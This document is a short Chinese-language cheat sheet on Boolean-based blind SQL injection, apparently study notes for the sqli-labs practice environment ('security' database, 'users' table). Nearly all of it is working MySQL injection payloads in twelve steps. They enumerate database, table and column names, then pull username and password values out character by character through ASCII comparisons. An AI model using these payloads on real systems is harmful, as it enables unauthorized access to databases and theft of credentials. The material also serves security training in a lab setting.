布尔型盲注
1.求闭合字符
2.求数据库名长度
and length(database())=8 %23
3.求当前数据库名对应的ASCII值
and ascii(substr(database(),1,1))=115 %23
4.求表的数量
and (select count(table_name) from information_schema.tables where table_schema='security')=4
%23
5.求表名的长度
and (select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6 %23
6.求表名对应的ASCII值
and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 %23
7.求列的数量
and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3 %23
8.求列名的长度
and (select length(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)<3 %23
9.求列名对应的ASCII值
and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105 %23
10.求字段的数量
and (select count(username) from security.users)=13 %23
11.求字段内容的长度
and (select length(username) from security.users limit 0,1)=4 %23
12.求字段对应的ASCII值
and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68 %23